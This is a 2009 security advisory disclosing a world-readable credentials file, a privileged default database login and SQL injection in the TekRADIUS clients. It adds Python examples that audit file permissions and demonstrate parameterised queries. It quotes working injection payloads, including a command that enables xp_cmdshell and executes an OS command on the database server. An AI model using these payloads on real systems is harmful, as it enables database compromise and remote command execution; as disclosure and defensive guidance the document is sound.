
Medium security hole in TekRADIUS



Hi,

I've identified a couple of security flaws affecting the TekRADIUS radius
server for Windows which may allow privilege escalation.  These issues were
reported by email to the vendor and have, I believe, been resolved.
 
Tim
-- 
Tim Brown
 
 


Nth Dimension Security Advisory (NDSA20090412)
Date: 12th April 2009
Author: Tim Brown
URL: /
Product: TekRADIUS 3.0
Vendor: Yasin KAPLAN
Risk: Medium

Summary

This advisory comes in 3 related parts:

1) By default, TekRADIUS connects to SQL Server as the sa (or equivalent)
account; this is to allow it to create its database.

2) The TekRADIUS database credentials are stored in obfuscated form, but
the file itself is accessible by any Windows user.

3) TekRADIUS comes with GUI and command line clients.  These do not
sanitise all input satisfactorily.  This can lead to SQL injection
allowing compromise of the database server and privilege escalation at
the Windows level.

Technical Details

1) In the event that TekRADIUS is left configured to use the sa (or equivalent)
account to access its database after the initial creation, any failure to
correctly sanitise input which results in SQL injection may allow an attacker
privileged access to the database server, not merely to the TekRADIUS tables.

2) TekRADIUS stores the database credentials in C:\Program Files\TekRADIUS\TekRADIUS.ini.
As we can see below, this file is accessible by any local Windows
user including all members of the Users group:

C:\Program Files\TekRADIUS>cacls TekRADIUS.ini
C:\Program Files\TekRADIUS\TekRADIUS.ini BUILTIN\Users:R
                                         BUILTIN\Power Users:C
                                         BUILTIN\Administrators:F
                                         NT AUTHORITY\SYSTEM:F
                                         NT AUTHORITY\TERMINAL SERVER USER:C

This happens even when we change the default install option and
opt only to install TekRADIUS for the current Windows user, and appears to
be by design as we discuss later.  Note that the credentials are obfuscated
with the intention of preventing direct database access.
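As an added example (not part of the advisory and not TekRADIUS code), the following Python reads cacls output such as the listing above, reports every principal outside Administrators and SYSTEM that holds any access to the file, and prints the icacls commands that would revoke it. The sample input is the advisory's own cacls listing embedded as a constant; the trusted-principal set and the icacls remediation are this example's assumptions about a sensible policy, not the vendor's guidance.

```python
import re

# Constructed sample input: the cacls listing quoted in the advisory.
INI_PATH = r"C:\Program Files\TekRADIUS\TekRADIUS.ini"
CACLS_OUTPUT = r"""C:\Program Files\TekRADIUS\TekRADIUS.ini BUILTIN\Users:R
                                         BUILTIN\Power Users:C
                                         BUILTIN\Administrators:F
                                         NT AUTHORITY\SYSTEM:F
                                         NT AUTHORITY\TERMINAL SERVER USER:C
"""

# Assumption: only these principals should be able to read a service's
# database credentials. Add the account TekRADIUS itself runs as if that
# is not SYSTEM.
TRUSTED = {r"BUILTIN\Administrators", r"NT AUTHORITY\SYSTEM"}

# cacls prints one "<principal>:<rights>" per ACE. Rights is a single letter
# (N none, R read, W write, C change, F full control), optionally preceded
# by inheritance flags such as (OI)(CI). "special access" ACEs, which cacls
# spreads over several lines, are not matched and are skipped.
ACE_RE = re.compile(r"^(?P<principal>[^:]+):(?P<rights>(?:\([A-Z]+\))*[NRWCF])$")


def parse_cacls(text, path):
    """Return a list of (principal, rights) pairs from cacls output for one file.

    The first line carries the path in front of the first ACE; later lines
    are only indented. The path contains a ':' of its own, so it is removed
    before the ACE pattern is applied.
    """
    aces = []
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith(path):
            line = line[len(path):].strip()
        match = ACE_RE.match(line)
        if match:
            aces.append((match.group("principal").strip(), match.group("rights")))
    return aces


def untrusted_access(aces, trusted=TRUSTED):
    """Principals outside `trusted` holding any right other than N (none).

    Read alone is enough to matter: the credentials in the file are only
    obfuscated, not encrypted, so any reader can recover them.
    """
    return [p for p, r in aces if p not in trusted and not r.endswith("N")]


def icacls_remediation(path, principals):
    """icacls commands that drop the offending ACEs.

    Files under Program Files usually receive these ACEs by inheritance, so
    inheritance is disabled (copying the inherited ACEs into explicit ones)
    before the removals; otherwise /remove has nothing explicit to delete.
    """
    cmds = ['icacls "%s" /inheritance:d' % path]
    cmds += ['icacls "%s" /remove "%s"' % (path, p) for p in principals]
    return cmds


if __name__ == "__main__":
    found = untrusted_access(parse_cacls(CACLS_OUTPUT, INI_PATH))
    print("Untrusted principals with access:", found)
    for cmd in icacls_remediation(INI_PATH, found):
        print(cmd)
```

Run against the embedded listing it flags Users, Power Users and TERMINAL SERVER USER; feed it the output of `cacls` on a live install instead to audit that machine. Re-run cacls after applying the commands to confirm only the trusted principals remain.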

3) TekRADIUS is intended to be managed using either a GUI or command line
client.  In both cases, non-privileged Windows users are only presented with
limited functionality designed to prevent certain changes being made.
However, this is not entirely successful due to insufficient input sanitisation,
which can lead to SQL injection.

When the GUI is opened by a non-privileged user, they are presented with a
window containing 3 tabs, one of which is the "Users" tab.  Within this is a
"Browse Users" text box.  Injecting the following string into this text box:

' union select system_user,@@version;--

results in a table being returned containing the output of the injected query
(the database login name and the SQL Server version string).

Whilst the command line client correctly sanitises most input, in one case
it does not, and it is therefore possible to inject arbitrary SQL into
queries made to the database server.  For example:

C:\Program Files\TekRADIUS>trcli -r "'; exec master.dbo.sp_configure 'show advanced options', 1; reconfigure; exec master.dbo.sp_configure 'xp_cmdshell', 1; reconfigure; exec master.dbo.xp_cmdshell 'ping www.nth-dimension.org.uk'--" 

This injects the SQL necessary to re-enable xp_cmdshell (required on SQL
Server 2005, where it is disabled by default) and executes
"ping www.nth-dimension.org.uk" on the database server.
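To make the sanitisation point concrete for both the GUI and trcli cases above, here is an added example (not TekRADIUS code and not from the advisory) of the two ways of building a "Browse Users" query, with an in-memory SQLite database standing in for SQL Server. The table names, columns and rows are constructed. Because `system_user`, `@@version` and stacked `exec` calls are Transact-SQL, the union payload is adapted to pull rows out of a second table instead, which is the same class of attack. With a parameterised query the entire user-supplied string becomes one LIKE pattern, so neither the union trick nor a `'; exec ...` chain has any query text to attach to.

```python
import sqlite3


def make_db():
    """Constructed sample data: a user table like the one the GUI browses,
    plus a second table that an unprivileged GUI user has no business reading."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE Users (UserName TEXT, Attribute TEXT)")
    con.executemany("INSERT INTO Users VALUES (?, ?)",
                    [("alice", "Framed-IP-Address"), ("bob", "Session-Timeout")])
    con.execute("CREATE TABLE Secrets (Name TEXT, Value TEXT)")
    con.execute("INSERT INTO Secrets VALUES ('db_password', 'hunter2')")
    con.commit()
    return con


# SQLite adaptation of the advisory's "' union select system_user,@@version;--":
# same shape (close the quote, add a UNION with a matching column count, comment
# out the remainder), different columns because those two are T-SQL built-ins.
UNION_PAYLOAD = "' union select Name, Value from Secrets --"


def browse_users_vulnerable(con, term):
    """The pattern the advisory describes: the search term is pasted into SQL."""
    sql = ("SELECT UserName, Attribute FROM Users "
           "WHERE UserName LIKE '%" + term + "%'")
    return con.execute(sql).fetchall()


def escape_like(term):
    """Escape LIKE metacharacters so the caller cannot widen the search either."""
    return (term.replace("\\", "\\\\")
                .replace("%", "\\%")
                .replace("_", "\\_"))


def browse_users_safe(con, term):
    """Parameterised version: the term travels as data, never as SQL text."""
    sql = ("SELECT UserName, Attribute FROM Users "
           "WHERE UserName LIKE ? ESCAPE '\\'")
    pattern = "%" + escape_like(term) + "%"
    return con.execute(sql, (pattern,)).fetchall()


if __name__ == "__main__":
    con = make_db()
    print("vulnerable:   ", browse_users_vulnerable(con, UNION_PAYLOAD))
    print("parameterised:", browse_users_safe(con, UNION_PAYLOAD))
```

The vulnerable function returns the Secrets row alongside the real users; the parameterised one returns nothing, because no user name contains the literal payload. The ESCAPE clause is the detail most often forgotten when switching to parameters: without it a term of `%` still lists every account, which is exactly the kind of "limited functionality" bypass the advisory is about.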

Solutions

Unfortunately, Nth Dimension are unaware of any public fixes for these issues at
the current time.  The vendor was contacted on the 13th April 2009 and
immediately responded.  The vendor provided a private patch that partially
resolved the issue, and Nth Dimension gave feedback outlining further SQL
injection issues in the GUI and suggesting parameterised queries.  Nth
Dimension also made suggestions around the installation routine to resolve the
file permission issues.  Nth Dimension are not aware that the patch or the
additional feedback has been included in the public product, and no further
emails have been received.  We would recommend that access to TekRADIUS.ini
is revoked for untrusted users, and that TekRADIUS is reconfigured to use
a non-privileged database account.

